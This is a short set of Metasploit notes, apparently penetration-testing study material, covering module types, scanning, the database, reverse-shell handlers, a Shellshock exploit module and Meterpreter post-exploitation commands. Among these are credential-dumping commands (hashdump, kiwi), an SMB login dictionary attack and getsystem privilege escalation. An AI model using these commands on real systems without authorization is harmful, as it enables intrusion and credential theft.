# Metasploit ## Modules * __Auxiliary__ scanners, crawlers and fuzzers * __Encoders__ encode payloads * __Evasion__ prepare payloads to circumvent signature based malware detection * __NOPs__ various architectures * __Payloads__ to run on target systems * Singles, inline payloads, for example generic/shell_reverse_tcp * Stagers, downloads the stages payloads * Stages, for example windows/x64/shell/reverse_tcp * __Post__ postexploitation ## Notes * Search via scope ```sh search type:auxiliary ``` * Send exploit to background ``` run -z ``` * `check` if target is vulnerable * `setg` sets variables globally * `unset payload` * Flush via `unset all` ## Sessions * `background` or `ctrl+z` * Foreground via `sessions -i ` ## Scanning * Portscan ```sh search portscan ``` * UDP Sweep via `scanner/discovery/udp_sweep` * SMB Scan via `scanner/smb/smb_version` and `smb_enumshares` * SMB login dictionary attack `scanner/smb/smb_login` * NetBios via `scanner/netbios/nbname` * HTTP version `scanner/http/http_version` ## Database * Start postgres * `msfdb init` * `db_status` * Separate `workspace -a ` * Safe scans via `db_nmap` * Show `hosts` * Show `services` * Set RHOST values via `hosts -R` ## Exploits * `show targets` * `show payloads` ## Reverse Shells * Multihandler, set options ```sh use exploit/multi/handler set payload ``` * Shellshock as an example ```sh use multi/http/apache_mod_cgi_bash_env_exec ``` ## Post Exploitation * `load kiwi` * `load python` * Windows * list SAM database ```sh migrate hashdump ``` * enum shares ```sh post/windows/gather/enum_shares ``` * Linux * `use post/linux/gather/hashdump` ## Other Meterpreter stuff * Staged and in disguise running as another servicename ``` getpid ps ``` * Attempt to elevate privileges ```sh getsystem ``` * Use `multi/handler` or exploit and get an overview via `show payloads` * UserID via `getuid`